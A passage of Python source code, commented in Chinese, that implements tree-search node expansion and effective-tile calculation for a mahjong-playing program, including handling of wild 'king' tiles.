int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] + 2)]) / cards_num * 2)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n w.append(float(left_num[translate16_33(dz[0] - 1)]) / cards_num * 2)\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(int(dz[0]) - 1)] + left_num[\n translate16_33(int(dz[0]) + 2)]) / cards_num * 2)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n w.append(float(left_num[translate16_33(int(dz[0]) + 1)]) / cards_num * 2)\n return effective_cards, w\n\n def getEffectiveCards(self, dz):\n \"\"\"\n 功能:获取搭子的有效牌,用于抓牌结点的扩展\n 思路:特定情景下,计算搭子的有效牌\n :param dz: 搭子\n :return: 有效牌集合\n \"\"\"\n # 获取有效牌,输入为搭子集合,\n combineCards = []\n\n # 单张牌的扩展,todo 只扩展将牌\n if len(dz) == 1:\n fCard = dz[0]\n # combineCards.append([fCard,[fCard, fCard]])\n # if fCard == self.kingCard:\n # combineCards.append([fCard, [fCard, fCard]])\n if fCard > 0x30 or fCard == self.kingCard:\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 1:\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 2:\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n elif fCard & 0x0f == 9:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n elif fCard & 0x0f == 8:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n\n else:\n combineCards.append([fCard - 2, [fCard - 2, fCard]])\n combineCards.append([fCard - 1, [fCard - 1, fCard]])\n combineCards.append([fCard, [fCard, fCard]])\n combineCards.append([fCard + 1, [fCard, fCard + 1]])\n combineCards.append([fCard + 2, [fCard, fCard + 2]])\n elif dz[1] == dz[0]:\n combineCards.append([dz[0], [dz[0], dz[0], dz[0]]])\n\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n combineCards.append([dz[0] + 2, [dz[0], dz[0] + 1, dz[0] + 2]])\n elif int(dz[0]) & 0x0F == 8:\n combineCards.append([dz[0] - 1, [dz[0] - 1, dz[0], dz[0] + 1]])\n else:\n combineCards.append([dz[0] - 1, [dz[0] - 1, dz[0], dz[0] + 1]])\n combineCards.append([dz[0] + 2, [dz[0], dz[0] + 1, dz[0] + 2]])\n elif dz[1] == dz[0] + 2:\n combineCards.append([dz[0] + 1, [dz[0], dz[0] + 1, dz[0] + 2]])\n\n return combineCards\n\n def expandNode_2(self, node, ocards, t2N, kingNum=0, kz=[], sz=[]):\n \"\"\"\n 功能:结点扩展方法\n 思路:递归结点扩展,先判断是否已经胡牌,若已经胡牌则停止扩展,再判断是否超过搜索深度,若是则停止扩展\n 对出牌结点进行出牌扩展,直接将出牌集合加入到扩展策略,若本路径的出牌集合已空,则分别将2N或宝牌加入到出牌集合,再次递归。出牌结点创建后需更新所有的出牌结点信息,再次递归\n 对抓牌结点进行抓牌扩展,直接将2N的有效牌加入到抓牌结点,若2N已空,则遍历出牌结点,获取该张牌的邻近牌,加入到2N中,再次递归。抓牌结点创建后,需更新抓牌结点信息,再次递归\n :param node: 本次需扩展的结点\n :param ocards: 出牌集合\n :param t2N: 2N集合\n :param kingNum: 未使用的宝数量\n :param baoHuanYuan: 是否作为宝还原进行扩展\n :param kz: 顺子\n :param sz: 刻子\n :return: 搜索树\n \"\"\"\n # node.nodeInfo()\n\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00:\n # #少搜索一层的奖励,×2概率\n # if self.kingNum!=0:\n # if node.level==self.xts*2:\n # node.rate*=2\n # return\n return\n\n # 宝吊多一层 \n if self.kingNum > 0 and node.feiKingNum + node.baoHuanYuan < self.kingNum + self.fei_king:\n if node.level >= (self.xts + 1) * 2:\n node.rate = 0\n return\n else:\n if node.level >= (self.xts) * 2:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n # 当ocards为空时,分支为其中一个2N或者kingCard\n if ocards == []:\n # 分支1:t2N添加到ocards中\n if t2N != []:\n\n # _,t2Nw = self.get_effective_cards_w(t2N)\n # min_w_set=[]\n # min_w=min(t2Nw)\n # for i in range(len(t2N)):\n # if t2Nw[i]==min_w:\n # min_w_set.append(t2N[i])\n # for t2 in min_w_set:\n # ocardsCP = copy.copy(t2)\n # t2NCP = copy.deepcopy(t2N)\n # t2NCP.remove(t2)\n # # 更新了ocards,t2N\n # 全遍历,将所有2N轮流加入到ocards中\n for t2 in t2N:\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2)\n ocardsCP = copy.copy(ocards)\n ocardsCP.extend(t2)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz)\n # 分支2 :kingCard加入到ocards中\n if kingNum != 0:\n # 当有ab/ac时,不出宝牌\n # for t2 in t2N:\n # if t2[0]+2==t2[1]:\n # return\n\n ocardsCPaddKing = [self.kingCard]\n # print (ocardsCPaddKing)\n self.expandNode(node, ocardsCPaddKing, t2N, kingNum=kingNum - 1, kz=kz, sz=sz)\n # 结束分支\n return\n # 胡牌多宝时,将宝放入ocards中,看是否宝吊\n # elif kingNum >= 2:\n # ocards_KingMore2 = copy.copy(ocards)\n # ocards_KingMore2.append(self.kingCard)\n # self.expandNode(node, ocards_KingMore2, t2N, kingNum=kingNum - 1, baoHuanYuan=baoHuanYuan, kz=kz, sz=sz)\n # return\n else:\n ocardsTMP = copy.copy(ocards)\n # t2NCP = t2N\n\n # 极小值出牌 merit 加快搜索树效率,可能会导致遗漏部分情况\n # min_ocards_w=[]\n # for tile in ocardsTMP:\n # min_ocards_w.append(self.minList[convert_hex2index(tile)])\n # min_ocards=[]\n # min_w=min(min_ocards_w)\n #\n # for i in range(len(min_ocards_w)):\n # if min_ocards_w[i]==min_w:\n # min_ocards.append(ocardsTMP[i])\n\n # ocardsTMP=min_ocards\n\n for out in ocardsTMP:\n # 已经摸过的牌,不需要再出\n if out in node.formerCatchCards:\n continue\n # if out==self.op_card:\n # continue\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1,\n dgRate=self.dgtable, kingCard=self.kingCard, t2N=t2N, ocards=ocardsCP,\n baoHuanYuan=node.baoHuanYuan)\n\n oNode.feiKingNum = node.feiKingNum\n if out == self.kingCard:\n oNode.feiKingNum += 1\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n # if oNode.jiang!=0:\n self.expandNode(oNode, ocardsCP, t2N, kingNum=kingNum)\n # elif kingNum!=0:\n # 有宝,分为将为宝与宝吊打法\n\n # 抓牌结点\n if node.type == 1:\n\n # 当t2N为空时,分支为将ocards中的一张牌加入到t2N中,或将kingCard加入到t2N中\n if t2N == []:\n # 分支1:将ocards中的一张牌加入到t2N中\n if ocards != []:\n for card in ocards:\n # print ('ocardsCP',ocardsCP)\n t2NCP = [[card]]\n ocardsCP = copy.copy(ocards)\n ocardsCP.remove(card)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz) # continue\n # 分支2 当ocards也为空,但是kingNum不为空时,将kingCard加入到t2N中,这时已经宝吊胡牌了\n if ocards == [] and kingNum != 0:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum - 1, kz=kz, sz=sz)\n return\n\n # 正式处理抓牌结点\n else:\n # ocardsCP = ocards\n t2NCPTMP = t2N\n\n # 极大值抓牌\n # t2Nw=[]\n # for t2 in t2NCPTMP:\n #\n # if str(t2) in self.t2Nw_Set.keys():\n # t2Nw.append(self.t2Nw_Set[str(t2)])\n # else:\n # _,w=self.get_effective_cards_w([t2])\n # t2Nw.append(w[0])\n # maxw=max(t2Nw)\n # maxw_t2N=[]\n # for i in range(len(t2NCPTMP)):\n # if t2Nw[i]==maxw:\n # maxw_t2N.append(t2NCPTMP[i])\n\n for t2 in t2NCPTMP:\n # print ('t2NCPTMP',t2NCPTMP)\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n combineCards = self.getEffectiveCards(t2)\n # print ('combineCards',combineCards)\n if combineCards == []:\n pass\n # print('Error combineCards is []')\n else:\n for e in combineCards: # e[0] catchcard e[1] t2N\n # 已经出过的牌,不需要再摸到。这样路径会变长没有意义\n if e[0] in node.formerOutCards:\n continue\n\n # #宝还原,让node的父结点生成一个复制结点\n if kingNum != 0 and e[0] == self.kingCard:\n # nodeCopy = copy.deepcopy(node)\n t2N_BHY = MJ.deepcopy(t2N)\n t2N_BHY.remove(t2)\n oNode = OutNode(cards=node.cards, outCard=node.outCard, level=node.level,\n dgRate=self.dgtable,\n kingCard=self.kingCard, t2N=t2N_BHY, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan + 1)\n # oNode.rate=1\n oNode.feiKingNum = node.feiKingNum\n oNode.kz = copy.copy(node.kz)\n # oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n # oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n\n oNode.setParent(node.parent)\n node.parent.addChild(oNode)\n\n # 更新结点信息 \n\n if len(e[1]) == 2:\n\n t2N_BHY.append(e[1])\n\n elif len(e[1]) == 3:\n\n if e[1][0] == e[1][1]:\n oNode.kz.append(e[1][0])\n oNode.kz.sort()\n else:\n oNode.sz.append(e[1][0])\n oNode.sz.sort()\n self.expandNode(oNode, ocards, t2N_BHY, kingNum=kingNum - 1, kz=[], sz=[])\n continue\n\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], leftNum=self.leftNum, remainNum=self.remainNum,\n t2=t2, level=node.level + 1,\n kingCard=self.kingCard, t2N=t2NCP, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan)\n # todo 可能存在bug\n # if self.xts == 0 and t2NCP == [] and ocardsCP.count(self.kingCard) + kingNum >= 2:\n # cNode.catchCard = self.kingCard\n # cNode.rate = 1\n\n cNode.feiKingNum = node.feiKingNum\n cNode.kz = copy.copy(node.kz)\n cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n cNode.sz.extend(sz)\n cNode.jiang = node.jiang\n\n t2NCP2 = MJ.deepcopy(t2NCP)\n if len(e[1]) == 3:\n if e[1][0] == e[1][1]:\n cNode.kz.append(e[1][0])\n else:\n cNode.sz.append(e[1][0])\n elif len(e[1]) == 2:\n # if e[1][0] == e[1][1]:\n\n t2NCP2.append(e[1])\n\n # 胡牌判断\n # 已胡牌,补充信息\n # kingNumall = ocardsCP.count(self.kingCard) + kingNum\n if len(cNode.kz) + len(cNode.sz) == 4:\n if (len(t2NCP2) == 1 and t2NCP2[0][0] == t2NCP2[0][1]): # 普通无宝胡牌,包括了宝吊(搜索时另一张牌也赋予了宝牌值)的情况\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n cNode.jiang = t2NCP2[0][0]\n\n elif kingNum == 2: # 宝还原 宝做将 胡牌\n # cNode.baoHuanYuan = True\n cNode.jiang = self.kingCard\n # elif self.xts == 0 and kingNumall == 1: # 飞宝后这里会使搜索多一层,todo 这里应该搜索不到吧\n # cNode.jiang = self.kingCard\n\n # 多宝胡牌判断\n kingNum_remain = kingNum\n trans_t2N = []\n if kingNum >= 2:\n # 一张宝做宝吊,其他宝牌做任意牌\n\n useking = kingNum - 1 # 宝吊牌\n\n t3NKz = []\n t3NSz = []\n for i in range(len(t2NCP2)):\n # eFCards = self.getEffectiveCards(t2NCP[i])\n if t2NCP2[i][0] == t2NCP2[i][1]:\n t3NKz.append(t2NCP2[i][0])\n\n else:\n if t2NCP2[i][0] & 0x0f == 8:\n t3NSz.append(t2NCP2[i][0] - 1)\n\n else:\n t3NSz.append(t2NCP2[i][0])\n trans_t2N.append(t2NCP2[i])\n useking -= 1\n\n if useking >= 0:\n # 上述处理,已经在2N中使用了宝牌变成了3N,所以这里必须有2个以上的宝牌才能凑成3N \n # 由于4宝会直接杠掉,这里不处理\n if useking >= 2:\n # noKingCard = 0\n for card in ocards:\n if card != self.kingCard:\n # noKingCard = card\n if useking - 2 >= 0:\n t3NKz.append(card)\n useking -= 2\n else:\n break\n # if noKingCard != 0:\n # t3NKz.append(noKingCard)\n # useking-=2\n\n if len(cNode.kz) + len(cNode.sz) + len(t3NSz) + len(t3NKz) == 4:\n cNode.kz.extend(t3NKz)\n cNode.sz.extend(t3NSz)\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n # 所有的2N都已用宝牌配完,这里直接置[]\n for t2tmp in trans_t2N:\n t2NCP2.remove(t2tmp)\n kingNum_remain = useking # 填胡了,才将宝牌更新\n\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(cNode.catchCard)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocards, t2NCP2, kingNum=kingNum_remain)\n\n def expandNode_(self, node, ocards, t2N, kingNum=0, baoHuanYuan=False, kz=[], sz=[]):\n # print('expandNode','node.kz,sz,jiang',node.kz,node.sz,node.jiang,'kz,sz',kz,sz,'ocards,t2N',ocards,t2N,'node.cards',node.cards,'node.type,level,rate',node.level,node.type,node.rate)\n\n if node.level >= self.xts * 2: # todo 此处修改为深度为xts ,不再为xts+1\n # if ocards==[] and len(t2N)==1 and t2N[0][0]==t2N[0][1]:\n # 胡牌\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00:\n return\n else:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n if ocards == [] and t2N != []:\n ocardsTMP = t2N[-1]\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2N[-1])\n else:\n ocardsTMP = ocards\n t2NCP = t2N\n for out in ocardsTMP:\n # if out==self.op_card:\n # continue\n\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1, dgRate=self.dgtable,\n kingCard=self.kingCard)\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n self.expandNode(oNode, ocardsCP, t2NCP)\n\n # 抓牌结点\n if node.type == 1:\n # 近胡牌状态,只有2张废牌,另一张做将\n if t2N == [] and len(ocards) == 1:\n t2NCPTMP = [copy.copy(ocards)]\n ocardsCP = []\n elif t2N != []:\n ocardsCP = ocards\n t2NCPTMP = t2N\n else: # todo 无成型的2N抓,现在省略掉了\n # ocardsCP = ocards\n # t2NCPTMP = t2N\n # print('Error expandNode', self.cards, node.cards, ocards, t2N, node.level)\n node.rate = 0\n return\n for t2 in t2NCPTMP:\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n effectiveCards = self.getEffectiveCards(t2)\n if effectiveCards == []:\n pass\n # print('Error effectiveCards is []')\n else:\n for e in effectiveCards:\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], leftNum=self.leftNum,\n remainNum=self.remainNum,\n t2=t2, level=node.level + 1, kingCard=self.kingCard)\n cNode.kz = copy.copy(node.kz)\n cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n cNode.sz.extend(sz)\n\n t2tmp = copy.copy(t2)\n t2tmp.append(e)\n t2tmp.sort()\n\n # 已胡牌,这里是补将牌\n if len(t2tmp) == 2:\n cNode.jiang = t2tmp[0]\n elif t2tmp[0] == t2tmp[1]:\n cNode.kz.append(t2tmp[0])\n else:\n cNode.sz.append(t2tmp[0])\n # 已胡牌,这里不是补将牌,补的其他2N\n if len(cNode.kz) + len(cNode.sz) == 4 and ocardsCP == [] and len(t2NCP) == 1 and t2NCP[0][0] == \\\n t2NCP[0][1]:\n # if len(cNode.sz)+len(cNode.kz)!=5:\n # print ('No hu Error',cNode.kz,cNode.sz,ocardsCP,t2NCP,self.cards,self.suits,cNode.level,node.level)\n # if node.kz==[24] and node.sz==[]\n cNode.jiang = t2NCP[0][0]\n # t2NCP=[]\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(e)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocardsCP, t2NCP)\n\n def expandNode(self, node, ocards, t2N, kingNum=0, kz=[], sz=[], xts=14):\n \"\"\"\n 功能:结点扩展方法\n 思路:递归结点扩展,先判断是否已经胡牌,若已经胡牌则停止扩展,再判断是否超过搜索深度,若是则停止扩展\n 对出牌结点进行出牌扩展,直接将出牌集合加入到扩展策略,若本路径的出牌集合已空,则分别将2N或宝牌加入到出牌集合,再次递归。出牌结点创建后需更新所有的出牌结点信息,再次递归\n 对抓牌结点进行抓牌扩展,直接将2N的有效牌加入到抓牌结点,若2N已空,则遍历出牌结点,获取该张牌的邻近牌,加入到2N中,再次递归。抓牌结点创建后,需更新抓牌结点信息,再次递归\n :param node: 本次需扩展的结点\n :param ocards: 出牌集合\n :param t2N: 2N集合\n :param kingNum: 未使用的宝数量\n :param baoHuanYuan: 是否作为宝还原进行扩展\n :param kz: 顺子\n :param sz: 刻子\n :return: 搜索树\n \"\"\"\n # node.nodeInfo()\n\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0x00 and node.type == 2:\n # #少搜索一层的奖励,×2概率\n # if self.kingNum!=0:\n # if node.level==self.xts*2:\n # node.rate*=2\n # return\n # if node.jiang!=self.kingCard:\n # return\n # else:\n # if ocards==[] and len(t2N)==1 and t2N[0][1]==self.kingCard:\n # return\n return\n\n # 宝吊多一层 \n if self.kingNum > 0 and node.feiKingNum + node.baoHuanYuan < self.kingNum + self.fei_king:\n\n # if node.jiang==self.kingCard:\n if node.level >= (xts + 1) * 2:\n node.rate = 0\n return\n else:\n if node.level >= (xts) * 2:\n node.rate = 0\n return\n\n # 出牌结点\n if node.type == 2:\n # 当ocards为空时,分支为其中一个2N或者kingCard\n\n if ocards == []:\n # 分支1:t2N添加到ocards中\n if t2N != []:\n\n # _,t2Nw = self.get_effective_cards_w(t2N)\n # min_w_set=[]\n # min_w=min(t2Nw)\n # for i in range(len(t2N)):\n # if t2Nw[i]==min_w:\n # min_w_set.append(t2N[i])\n # for t2 in min_w_set:\n # ocardsCP = copy.copy(t2)\n # t2NCP = copy.deepcopy(t2N)\n # t2NCP.remove(t2)\n # self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz,xts=xts)\n\n # # 更新了ocards,t2N\n # 全遍历,将所有2N轮流加入到ocards中\n for t2 in t2N:\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2)\n ocardsCP = copy.copy(ocards)\n ocardsCP.extend(t2)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, kz=kz, sz=sz, xts=xts)\n # 分支2 :kingCard加入到ocards中\n if kingNum != 0:\n # 当有ab/ac时,不出宝牌\n # for t2 in t2N:\n # if t2[0]+2==t2[1]:\n # return\n\n ocardsCPaddKing = [self.kingCard]\n # print (ocardsCPaddKing)\n self.expandNode(node, ocardsCPaddKing, t2N, kingNum=kingNum - 1, kz=kz, sz=sz, xts=xts)\n # 结束分支\n return\n # 胡牌多宝时,将宝放入ocards中,看是否宝吊\n # elif kingNum >= 2:\n # ocards_KingMore2 = copy.copy(ocards)\n # ocards_KingMore2.append(self.kingCard)\n # self.expandNode(node, ocards_KingMore2, t2N, kingNum=kingNum - 1, baoHuanYuan=baoHuanYuan, kz=kz, sz=sz)\n # return\n else:\n ocardsTMP = copy.copy(ocards)\n # t2NCP = t2N\n\n # 极小值出牌 merit 加快搜索树效率,可能会导致遗漏部分情况\n # min_ocards_w=[]\n # for tile in ocardsTMP:\n # min_ocards_w.append(self.minList[convert_hex2index(tile)])\n # min_ocards=[]\n # min_w=min(min_ocards_w)\n #\n # for i in range(len(min_ocards_w)):\n # if min_ocards_w[i]==min_w:\n # min_ocards.append(ocardsTMP[i])\n\n # ocardsTMP=min_ocards\n\n for out in ocardsTMP:\n # 已经摸过的牌,不需要再出\n if out in node.formerCatchCards:\n continue\n # if out==self.op_card:\n # continue\n ocardsCP = copy.copy(ocardsTMP)\n ocardsCP.remove(out)\n\n cardsCP = copy.copy(node.cards)\n cardsCP.remove(out)\n\n oNode = OutNode(cards=cardsCP, outCard=out, level=node.level + 1,\n dgRate=self.dgtable, kingCard=self.kingCard, t2N=t2N, ocards=ocardsCP,\n baoHuanYuan=node.baoHuanYuan)\n # if oNode.level==1:\n # oNode.firstOutCard=out\n # else:\n # oNode.firstOutCard=node.firstOutCard\n\n oNode.feiKingNum = node.feiKingNum\n if out == self.kingCard:\n oNode.feiKingNum += 1\n if self.kingNum > 1 and kingNum > 1:\n xts += 1\n oNode.kz = copy.copy(node.kz)\n oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n # 重复结点检��,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # child = self.inChild(node, oNode)\n # if child != None:\n # print('hello', out)\n # continue\n # print ('inChild', child.type)\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n oNode.formerOutCards.append(out)\n oNode.formerOutCards.sort()\n\n oNode.setParent(node)\n node.addChild(oNode)\n\n oNode.kz.sort()\n oNode.sz.sort()\n # if oNode.jiang!=0:\n\n self.expandNode(oNode, ocardsCP, t2N, kingNum=kingNum, xts=xts)\n # elif kingNum!=0:\n # 有宝,分为将为宝与宝吊打法\n\n # 抓牌结点\n if node.type == 1:\n\n # 当t2N为空时,分支为将ocards中的一张牌加入到t2N中,或将kingCard加入到t2N中\n # if t2N==[]:\n # print (t2N)\n if t2N == []:\n # 分支1:将ocards中的一张牌加入到t2N中\n if ocards != []:\n for card in ocards:\n # print ('ocardsCP',ocardsCP)\n t2NCP = [[card]]\n ocardsCP = copy.copy(ocards)\n ocardsCP.remove(card)\n self.expandNode(node, ocardsCP, t2NCP, kingNum=kingNum, xts=xts) # continue\n # 分支2 当ocards也为空,但是kingNum不为空时,将kingCard加入到t2N中,这时已经宝吊胡牌了\n\n # print ('test',ocards,kingNum,node.jiang)\n if ocards == []:\n if kingNum != 0:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum - 1, xts=xts)\n elif node.jiang == self.kingCard:\n t2NCP = [[self.kingCard]]\n self.expandNode(node, ocards, t2NCP, kingNum=kingNum, xts=xts)\n return\n\n # 正式处理抓牌结点\n else:\n # ocardsCP = ocards\n t2NCPTMP = t2N\n\n # 极大值抓牌\n # t2Nw=[]\n # for t2 in t2NCPTMP:\n #\n # if str(t2) in self.t2Nw_Set.keys():\n # t2Nw.append(self.t2Nw_Set[str(t2)])\n # else:\n # _,w=self.get_effective_cards_w([t2])\n # t2Nw.append(w[0])\n # maxw=max(t2Nw)\n # maxw_t2N=[]\n # for i in range(len(t2NCPTMP)):\n # if t2Nw[i]==maxw:\n # maxw_t2N.append(t2NCPTMP[i])\n\n for t2 in t2NCPTMP:\n # print ('t2NCPTMP',t2NCPTMP)\n t2NCP = MJ.deepcopy(t2NCPTMP)\n t2NCP.remove(t2)\n\n combineCards = self.getEffectiveCards(t2)\n # print ('combineCards',combineCards)\n if combineCards == []:\n pass\n # print('Error combineCards is []')\n else:\n for e in combineCards: # e[0] catchcard e[1] t2N\n # 已经出过的牌,不需要再摸到。这样路径会变长没有意义\n if e[0] in node.formerOutCards:\n continue\n\n # #宝还原,让node的父结点生成一个复制结点\n if len(t2) == 2 and e[0] == self.kingCard:\n BHY_ocards = copy.copy(ocards)\n BHY_kingNum = kingNum\n if kingNum != 0:\n BHY_kingNum = kingNum - 1\n elif self.kingCard in ocards:\n BHY_ocards.remove(self.kingCard)\n else:\n continue\n # node.nodeInfo()\n\n # nodeCopy = copy.deepcopy(node)\n t2N_BHY = MJ.deepcopy(t2N)\n t2N_BHY.remove(t2)\n oNode = OutNode(cards=node.cards, outCard=node.outCard, level=node.level,\n dgRate=self.dgtable,\n kingCard=self.kingCard, t2N=t2N_BHY, ocards=BHY_ocards,\n baoHuanYuan=node.baoHuanYuan + 1)\n\n # if oNode.level == 1:\n # oNode.firstOutCard = out\n # else:\n oNode.firstOutCard = node.firstOutCard\n\n # oNode.rate=1\n oNode.feiKingNum = node.feiKingNum\n oNode.kz = copy.copy(node.kz)\n # oNode.kz.extend(kz)\n oNode.sz = copy.copy(node.sz)\n # oNode.sz.extend(sz)\n oNode.jiang = node.jiang\n\n oNode.formerCatchCards = copy.copy(node.formerCatchCards)\n oNode.formerOutCards = copy.copy(node.formerOutCards)\n\n oNode.setParent(node.parent)\n node.parent.addChild(oNode)\n\n # 更新结点信息 \n\n if len(e[1]) == 2:\n\n t2N_BHY.append(e[1])\n\n elif len(e[1]) == 3:\n\n if e[1][0] == e[1][1]:\n oNode.kz.append(e[1][0])\n oNode.kz.sort()\n else:\n oNode.sz.append(e[1][0])\n oNode.sz.sort()\n # oNode.nodeInfo()\n self.expandNode(oNode, BHY_ocards, t2N_BHY, kingNum=BHY_kingNum, kz=[], sz=[], xts=xts)\n continue\n\n cardsCP = copy.copy(node.cards)\n cardsCP.append(e[0])\n cardsCP.sort()\n\n cNode = CatchNode(cards=cardsCP, catchCard=e[0], leftNum=self.leftNum, remainNum=self.remainNum,\n t2=t2, level=node.level + 1,\n kingCard=self.kingCard, t2N=t2NCP, ocards=ocards,\n baoHuanYuan=node.baoHuanYuan)\n # todo 可能存在bug\n # if self.xts == 0 and t2NCP == [] and ocardsCP.count(self.kingCard) + kingNum >= 2:\n # cNode.catchCard = self.kingCard\n # cNode.rate = 1\n # if cNode.level == 1:\n # cNode.firstOutCard = out\n # else:\n # cNode.firstOutCard = node.firstOutCard\n cNode.feiKingNum = node.feiKingNum\n cNode.kz = copy.copy(node.kz)\n # cNode.kz.extend(kz)\n cNode.sz = copy.copy(node.sz)\n # cNode.sz.extend(sz)\n cNode.jiang = node.jiang\n\n t2NCP2 = MJ.deepcopy(t2NCP)\n if len(e[1]) == 3:\n if e[1][0] == e[1][1]:\n cNode.kz.append(e[1][0])\n else:\n cNode.sz.append(e[1][0])\n elif len(e[1]) == 2:\n # if e[1][0] == e[1][1]:\n\n t2NCP2.append(e[1])\n\n # 胡牌判断\n # 已胡牌,补充信息\n # kingNumall = ocardsCP.count(self.kingCard) + kingNum\n if len(cNode.kz) + len(cNode.sz) == 4:\n if (len(t2NCP2) == 1 and t2NCP2[0][0] == t2NCP2[0][1]): # 